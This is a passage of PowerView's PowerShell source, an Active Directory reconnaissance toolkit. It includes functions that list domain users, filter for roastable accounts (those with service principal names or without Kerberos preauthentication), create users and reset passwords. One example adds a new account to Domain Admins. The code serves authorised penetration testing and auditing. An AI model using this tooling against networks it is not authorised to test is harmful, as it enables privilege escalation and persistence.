[OutputType([System.DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass])]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True)]
[Alias('Class')]
[ValidateNotNullOrEmpty()]
[String[]]
$ClassName,
[Alias('Name')]
[ValidateNotNullOrEmpty()]
[String]
$Forest,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
PROCESS {
$Arguments = @{}
if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest }
if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential }
$ForestObject = Get-Forest @Arguments
if ($ForestObject) {
if ($PSBoundParameters['ClassName']) {
ForEach ($TargetClass in $ClassName) {
$ForestObject.Schema.FindClass($TargetClass)
}
}
else {
$ForestObject.Schema.FindAllClasses()
}
}
}
}
function Find-DomainObjectPropertyOutlier {
<#
.SYNOPSIS
Finds user/group/computer objects in AD that have 'outlier' properties set.
Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: Get-Domain, Get-DomainUser, Get-DomainGroup, Get-DomainComputer
.DESCRIPTION
A 'reference' set of property names is calculated, either from a standard set preserved
for user/group/computers, or from the array of names passed to -ReferencePropertySet, or
from the property names of the passed -ReferenceObject. Every user/group/computer object
(depending on determined class) are enumerated, and for each object, if the object has a
'non-standard' property set (meaning a property not held by the reference set), the object's
samAccountName, property name, and property value are output to the pipeline.
.PARAMETER ClassName
Specifies the AD object class to find property outliers for, 'user', 'group', or 'computer'.
If -ReferenceObject is specified, this will be automatically extracted, if possible.
.PARAMETER ReferencePropertySet
Specifies an array of property names to diff against the class schema.
.PARAMETER ReferenceObject
Specicifes the PowerView user/group/computer object to extract property names
from to use as the reference set.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Find-DomainObjectPropertyOutlier -ClassName 'User'
Enumerates users in the current domain with 'outlier' properties filled in.
.EXAMPLE
Find-DomainObjectPropertyOutlier -ClassName 'Group' -Domain external.local
Enumerates groups in the external.local forest/domain with 'outlier' properties filled in.
.EXAMPLE
Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier
Enumerates computers in the current domain with 'outlier' properties filled in.
.OUTPUTS
PowerView.PropertyOutlier
Custom PSObject with translated object property outliers.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.PropertyOutlier')]
[CmdletBinding(DefaultParameterSetName = 'ClassName')]
Param(
[Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ClassName')]
[Alias('Class')]
[ValidateSet('User', 'Group', 'Computer')]
[String]
$ClassName,
[ValidateNotNullOrEmpty()]
[String[]]
$ReferencePropertySet,
[Parameter(ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ReferenceObject')]
[PSCustomObject]
$ReferenceObject,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$UserReferencePropertySet = @('admincount','accountexpires','badpasswordtime','badpwdcount','cn','codepage','countrycode','description', 'displayname','distinguishedname','dscorepropagationdata','givenname','instancetype','iscriticalsystemobject','lastlogoff','lastlogon','lastlogontimestamp','lockouttime','logoncount','memberof','msds-supportedencryptiontypes','name','objectcategory','objectclass','objectguid','objectsid','primarygroupid','pwdlastset','samaccountname','samaccounttype','sn','useraccountcontrol','userprincipalname','usnchanged','usncreated','whenchanged','whencreated')
$GroupReferencePropertySet = @('admincount','cn','description','distinguishedname','dscorepropagationdata','grouptype','instancetype','iscriticalsystemobject','member','memberof','name','objectcategory','objectclass','objectguid','objectsid','samaccountname','samaccounttype','systemflags','usnchanged','usncreated','whenchanged','whencreated')
$ComputerReferencePropertySet = @('accountexpires','badpasswordtime','badpwdcount','cn','codepage','countrycode','distinguishedname','dnshostname','dscorepropagationdata','instancetype','iscriticalsystemobject','lastlogoff','lastlogon','lastlogontimestamp','localpolicyflags','logoncount','msds-supportedencryptiontypes','name','objectcategory','objectclass','objectguid','objectsid','operatingsystem','operatingsystemservicepack','operatingsystemversion','primarygroupid','pwdlastset','samaccountname','samaccounttype','serviceprincipalname','useraccountcontrol','usnchanged','usncreated','whenchanged','whencreated')
$SearcherArguments = @{}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
# Domain / Credential
if ($PSBoundParameters['Domain']) {
if ($PSBoundParameters['Credential']) {
$TargetForest = Get-Domain -Domain $Domain | Select-Object -ExpandProperty Forest | Select-Object -ExpandProperty Name
}
else {
$TargetForest = Get-Domain -Domain $Domain -Credential $Credential | Select-Object -ExpandProperty Forest | Select-Object -ExpandProperty Name
}
Write-Verbose "[Find-DomainObjectPropertyOutlier] Enumerated forest '$TargetForest' for target domain '$Domain'"
}
$SchemaArguments = @{}
if ($PSBoundParameters['Credential']) { $SchemaArguments['Credential'] = $Credential }
if ($TargetForest) {
$SchemaArguments['Forest'] = $TargetForest
}
}
PROCESS {
if ($PSBoundParameters['ReferencePropertySet']) {
Write-Verbose "[Find-DomainObjectPropertyOutlier] Using specified -ReferencePropertySet"
$ReferenceObjectProperties = $ReferencePropertySet
}
elseif ($PSBoundParameters['ReferenceObject']) {
Write-Verbose "[Find-DomainObjectPropertyOutlier] Extracting property names from -ReferenceObject to use as the reference property set"
$ReferenceObjectProperties = Get-Member -InputObject $ReferenceObject -MemberType NoteProperty | Select-Object -Expand Name
$ReferenceObjectClass = $ReferenceObject.objectclass | Select-Object -Last 1
Write-Verbose "[Find-DomainObjectPropertyOutlier] Calculated ReferenceObjectClass : $ReferenceObjectClass"
}
else {
Write-Verbose "[Find-DomainObjectPropertyOutlier] Using the default reference property set for the object class '$ClassName'"
}
if (($ClassName -eq 'User') -or ($ReferenceObjectClass -eq 'User')) {
$Objects = Get-DomainUser @SearcherArguments
if (-not $ReferenceObjectProperties) {
$ReferenceObjectProperties = $UserReferencePropertySet
}
}
elseif (($ClassName -eq 'Group') -or ($ReferenceObjectClass -eq 'Group')) {
$Objects = Get-DomainGroup @SearcherArguments
if (-not $ReferenceObjectProperties) {
$ReferenceObjectProperties = $GroupReferencePropertySet
}
}
elseif (($ClassName -eq 'Computer') -or ($ReferenceObjectClass -eq 'Computer')) {
$Objects = Get-DomainComputer @SearcherArguments
if (-not $ReferenceObjectProperties) {
$ReferenceObjectProperties = $ComputerReferencePropertySet
}
}
else {
throw "[Find-DomainObjectPropertyOutlier] Invalid class: $ClassName"
}
ForEach ($Object in $Objects) {
$ObjectProperties = Get-Member -InputObject $Object -MemberType NoteProperty | Select-Object -Expand Name
ForEach($ObjectProperty in $ObjectProperties) {
if ($ReferenceObjectProperties -NotContains $ObjectProperty) {
$Out = New-Object PSObject
$Out | Add-Member Noteproperty 'SamAccountName' $Object.SamAccountName
$Out | Add-Member Noteproperty 'Property' $ObjectProperty
$Out | Add-Member Noteproperty 'Value' $Object.$ObjectProperty
$Out.PSObject.TypeNames.Insert(0, 'PowerView.PropertyOutlier')
$Out
}
}
}
}
}
########################################################
#
# "net *" replacements and other fun start below
#
########################################################
function Get-DomainUser {
<#
.SYNOPSIS
Return all users or specific user objects in AD.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainSearcher, Convert-ADName, Convert-LDAPProperty
.DESCRIPTION
Builds a directory searcher object using Get-DomainSearcher, builds a custom
LDAP filter based on targeting/filter parameters, and searches for all objects
matching the criteria. To only return specific properties, use
"-Properties samaccountname,usnchanged,...". By default, all user objects for
the current domain are returned.
.PARAMETER Identity
A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
Wildcards accepted. Also accepts DOMAIN\user format.
.PARAMETER SPN
Switch. Only return user objects with non-null service principal names.
.PARAMETER UACFilter
Dynamic parameter that accepts one or more values from $UACEnum, including
"NOT_X" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'.
.PARAMETER AdminCount
Switch. Return users with '(adminCount=1)' (meaning are/were privileged).
.PARAMETER AllowDelegation
Switch. Return user accounts that are not marked as 'sensitive and not allowed for delegation'
.PARAMETER DisallowDelegation
Switch. Return user accounts that are marked as 'sensitive and not allowed for delegation'
.PARAMETER TrustedToAuth
Switch. Return computer objects that are trusted to authenticate for other principals.
.PARAMETER PreauthNotRequired
Switch. Return user accounts with "Do not require Kerberos preauthentication" set.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER Properties
Specifies the properties of the output object to retrieve from the server.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER SecurityMasks
Specifies an option for examining security information of a directory object.
One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER FindOne
Only return one result object.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.PARAMETER Raw
Switch. Return raw results instead of translating the fields into a custom PSObject.
.EXAMPLE
Get-DomainUser -Domain testlab.local
Return all users for the testlab.local domain
.EXAMPLE
Get-DomainUser "S-1-5-21-890171859-3433809279-3366196753-1108","administrator"
Return the user with the given SID, as well as Administrator.
.EXAMPLE
'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff
lastlogoff samaccountname
---------- --------------
12/31/1600 4:00:00 PM dfm.a
12/31/1600 4:00:00 PM dfm
12/31/1600 4:00:00 PM harmj0y
12/31/1600 4:00:00 PM Administrator
.EXAMPLE
Get-DomainUser -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -AdminCount -AllowDelegation
Search the specified OU for privileged user (AdminCount = 1) that allow delegation
.EXAMPLE
Get-DomainUser -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon
Search for users with a primary group ID other than 513 ('domain users') and only return samaccountname and lastlogon
.EXAMPLE
Get-DomainUser -UACFilter DONT_REQ_PREAUTH,NOT_PASSWORD_EXPIRED
Find users who doesn't require Kerberos preauthentication and DON'T have an expired password.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainUser -Credential $Cred
.EXAMPLE
Get-Domain | Select-Object -Expand name
testlab.local
Get-DomainUser dev\user1 -Verbose -Properties distinguishedname
VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
VERBOSE: [Get-DomainUser] filter string: (&(samAccountType=805306368)(|(samAccountName=user1)))
distinguishedname
-----------------
CN=user1,CN=Users,DC=dev,DC=testlab,DC=local
.INPUTS
String
.OUTPUTS
PowerView.User
Custom PSObject with translated user property fields.
PowerView.User.Raw
The raw DirectoryServices.SearchResult object, if -Raw is enabled.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.User')]
[OutputType('PowerView.User.Raw')]
[CmdletBinding(DefaultParameterSetName = 'AllowDelegation')]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
[String[]]
$Identity,
[Switch]
$SPN,
[Switch]
$AdminCount,
[Parameter(ParameterSetName = 'AllowDelegation')]
[Switch]
$AllowDelegation,
[Parameter(ParameterSetName = 'DisallowDelegation')]
[Switch]
$DisallowDelegation,
[Switch]
$TrustedToAuth,
[Alias('KerberosPreauthNotRequired', 'NoPreauth')]
[Switch]
$PreauthNotRequired,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[String[]]
$Properties,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
[String]
$SecurityMasks,
[Switch]
$Tombstone,
[Alias('ReturnOne')]
[Switch]
$FindOne,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[Switch]
$Raw
)
DynamicParam {
$UACValueNames = [Enum]::GetNames($UACEnum)
# add in the negations
$UACValueNames = $UACValueNames | ForEach-Object {$_; "NOT_$_"}
# create new dynamic parameter
New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array])
}
BEGIN {
$SearcherArguments = @{}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
$UserSearcher = Get-DomainSearcher @SearcherArguments
}
PROCESS {
#bind dynamic parameter to a friendly variable
if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) {
New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters
}
if ($UserSearcher) {
$IdentityFilter = ''
$Filter = ''
$Identity | Where-Object {$_} | ForEach-Object {
$IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
if ($IdentityInstance -match '^S-1-') {
$IdentityFilter += "(objectsid=$IdentityInstance)"
}
elseif ($IdentityInstance -match '^CN=') {
$IdentityFilter += "(distinguishedname=$IdentityInstance)"
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
# if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
# and rebuild the domain searcher
$IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
Write-Verbose "[Get-DomainUser] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
$SearcherArguments['Domain'] = $IdentityDomain
$UserSearcher = Get-DomainSearcher @SearcherArguments
if (-not $UserSearcher) {
Write-Warning "[Get-DomainUser] Unable to retrieve domain searcher for '$IdentityDomain'"
}
}
}
elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
$GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
$IdentityFilter += "(objectguid=$GuidByteString)"
}
elseif ($IdentityInstance.Contains('\')) {
$ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical
if ($ConvertedIdentityInstance) {
$UserDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))
$UserName = $IdentityInstance.Split('\')[1]
$IdentityFilter += "(samAccountName=$UserName)"
$SearcherArguments['Domain'] = $UserDomain
Write-Verbose "[Get-DomainUser] Extracted domain '$UserDomain' from '$IdentityInstance'"
$UserSearcher = Get-DomainSearcher @SearcherArguments
}
}
else {
$IdentityFilter += "(samAccountName=$IdentityInstance)"
}
}
if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
$Filter += "(|$IdentityFilter)"
}
if ($PSBoundParameters['SPN']) {
Write-Verbose '[Get-DomainUser] Searching for non-null service principal names'
$Filter += '(servicePrincipalName=*)'
}
if ($PSBoundParameters['AllowDelegation']) {
Write-Verbose '[Get-DomainUser] Searching for users who can be delegated'
# negation of "Accounts that are sensitive and not trusted for delegation"
$Filter += '(!(userAccountControl:1.2.840.113556.1.4.803:=1048574))'
}
if ($PSBoundParameters['DisallowDelegation']) {
Write-Verbose '[Get-DomainUser] Searching for users who are sensitive and not trusted for delegation'
$Filter += '(userAccountControl:1.2.840.113556.1.4.803:=1048574)'
}
if ($PSBoundParameters['AdminCount']) {
Write-Verbose '[Get-DomainUser] Searching for adminCount=1'
$Filter += '(admincount=1)'
}
if ($PSBoundParameters['TrustedToAuth']) {
Write-Verbose '[Get-DomainUser] Searching for users that are trusted to authenticate for other principals'
$Filter += '(msds-allowedtodelegateto=*)'
}
if ($PSBoundParameters['PreauthNotRequired']) {
Write-Verbose '[Get-DomainUser] Searching for user accounts that do not require kerberos preauthenticate'
$Filter += '(userAccountControl:1.2.840.113556.1.4.803:=4194304)'
}
if ($PSBoundParameters['LDAPFilter']) {
Write-Verbose "[Get-DomainUser] Using additional LDAP filter: $LDAPFilter"
$Filter += "$LDAPFilter"
}
# build the LDAP filter for the dynamic UAC filter value
$UACFilter | Where-Object {$_} | ForEach-Object {
if ($_ -match 'NOT_.*') {
$UACField = $_.Substring(4)
$UACValue = [Int]($UACEnum::$UACField)
$Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))"
}
else {
$UACValue = [Int]($UACEnum::$_)
$Filter += "(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)"
}
}
$UserSearcher.filter = "(&(samAccountType=805306368)$Filter)"
Write-Verbose "[Get-DomainUser] filter string: $($UserSearcher.filter)"
if ($PSBoundParameters['FindOne']) { $Results = $UserSearcher.FindOne() }
else { $Results = $UserSearcher.FindAll() }
$Results | Where-Object {$_} | ForEach-Object {
if ($PSBoundParameters['Raw']) {
# return raw result objects
$User = $_
$User.PSObject.TypeNames.Insert(0, 'PowerView.User.Raw')
}
else {
$User = Convert-LDAPProperty -Properties $_.Properties
$User.PSObject.TypeNames.Insert(0, 'PowerView.User')
}
$User
}
if ($Results) {
try { $Results.dispose() }
catch {
Write-Verbose "[Get-DomainUser] Error disposing of the Results object: $_"
}
}
$UserSearcher.dispose()
}
}
}
function New-DomainUser {
<#
.SYNOPSIS
Creates a new domain user (assuming appropriate permissions) and returns the user object.
TODO: implement all properties that New-ADUser implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-PrincipalContext
.DESCRIPTION
First binds to the specified domain context using Get-PrincipalContext.
The bound domain context is then used to create a new
DirectoryServices.AccountManagement.UserPrincipal with the specified user properties.
.PARAMETER SamAccountName
Specifies the Security Account Manager (SAM) account name of the user to create.
Maximum of 256 characters. Mandatory.
.PARAMETER AccountPassword
Specifies the password for the created user. Mandatory.
.PARAMETER Name
Specifies the name of the user to create. If not provided, defaults to SamAccountName.
.PARAMETER DisplayName
Specifies the display name of the user to create. If not provided, defaults to SamAccountName.
.PARAMETER Description
Specifies the description of the user to create.
.PARAMETER Domain
Specifies the domain to use to search for user/group principals, defaults to the current domain.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword
Creates the 'harmj0y2' user with the specified description and password.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$user = New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword -Credential $Cred
Creates the 'harmj0y2' user with the specified description and password, using the specified
alternate credentials.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred
Creates the 'andy' user with the specified description and password, using the specified
alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember
and the alternate credentials.
.OUTPUTS
DirectoryServices.AccountManagement.UserPrincipal
.LINK
http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('DirectoryServices.AccountManagement.UserPrincipal')]
Param(
[Parameter(Mandatory = $True)]
[ValidateLength(0, 256)]
[String]
$SamAccountName,
[Parameter(Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[Alias('Password')]
[Security.SecureString]
$AccountPassword,
[ValidateNotNullOrEmpty()]
[String]
$Name,
[ValidateNotNullOrEmpty()]
[String]
$DisplayName,
[ValidateNotNullOrEmpty()]
[String]
$Description,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
$ContextArguments = @{
'Identity' = $SamAccountName
}
if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }
if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }
$Context = Get-PrincipalContext @ContextArguments
if ($Context) {
$User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context.Context)
# set all the appropriate user parameters
$User.SamAccountName = $Context.Identity
$TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
$User.SetPassword($TempCred.GetNetworkCredential().Password)
$User.Enabled = $True
$User.PasswordNotRequired = $False
if ($PSBoundParameters['Name']) {
$User.Name = $Name
}
else {
$User.Name = $Context.Identity
}
if ($PSBoundParameters['DisplayName']) {
$User.DisplayName = $DisplayName
}
else {
$User.DisplayName = $Context.Identity
}
if ($PSBoundParameters['Description']) {
$User.Description = $Description
}
Write-Verbose "[New-DomainUser] Attempting to create user '$SamAccountName'"
try {
$Null = $User.Save()
Write-Verbose "[New-DomainUser] User '$SamAccountName' successfully created"
$User
}
catch {
Write-Warning "[New-DomainUser] Error creating user '$SamAccountName' : $_"
}
}
}
function Set-DomainUserPassword {
<#
.SYNOPSIS
Sets the password for a given user identity.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-PrincipalContext
.DESCRIPTION
First binds to the specified domain context using Get-PrincipalContext.
The bound domain context is then used to search for the specified user -Identity,
which returns a DirectoryServices.AccountManagement.UserPrincipal object. The
SetPassword() function is then invoked on the user, setting the password to -AccountPassword.
.PARAMETER Identity
A user SamAccountName (e.g. User1), DistinguishedName (e.g. CN=user1,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1113), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
specifying the user to reset the password for.
.PARAMETER AccountPassword
Specifies the password to reset the target user's to. Mandatory.
.PARAMETER Domain
Specifies the domain to use to search for the user identity, defaults to the current domain.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword
Resets the password for 'andy' to the password specified.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred
Resets the password for 'andy' usering the alternate credentials specified.
.OUTPUTS
DirectoryServices.AccountManagement.UserPrincipal
.LINK
http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('DirectoryServices.AccountManagement.UserPrincipal')]
Param(
[Parameter(Position = 0, Mandatory = $True)]
[Alias('UserName', 'UserIdentity', 'User')]
[String]
$Identity,
[Parameter(Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[Alias('Password')]
[Security.SecureString]
$AccountPassword,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
$ContextArguments = @{ 'Identity' = $Identity }
if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }
if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }
$Context = Get-PrincipalContext @ContextArguments
if ($Context) {
$User = [System.DirectoryServices.AccountManagement.UserPrincipal]::FindByIdentity($Context.Context, $Identity)
if ($User) {
Write-Verbose "[Set-DomainUserPassword] Attempting to set the password for user '$Identity'"
try {
$TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
$User.SetPassword($TempCred.GetNetworkCredential().Password)
$Null = $User.Save()
Write-Verbose "[Set-DomainUserPassword] Password for user '$Identity' successfully reset"
}
catch {
Write-Warning "[Set-DomainUserPassword] Error setting password for user '$Identity' : $_"
}
}
else {
Write-Warning "[Set-DomainUserPassword] Unable to find user '$Identity'"
}
}
}
function Get-DomainUserEvent {
<#
.SYNOPSIS
Enumerate account logon events (ID 4624) and Logon with explicit credential
events (ID 4648) from the specified host (default of the localhost).
Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
.DESCRIPTION
This function uses an XML path filter passed to Get-WinEvent to retrieve
security events with IDs of 4624 (logon events) or 4648 (explicit credential
logon events) from -StartTime (default of now-1 day) to -EndTime (default of now).
A maximum of -MaxEvents (default of 5000) are returned.
.PARAMETER ComputerName
Specifies the computer name to retrieve events from, default of localhost.
.PARAMETER StartTime
The [DateTime] object representing the start of when to collect events.
Default of [DateTime]::Now.AddDays(-1).
.PARAMETER EndTime
The [DateTime] object representing the end of when to collect events.
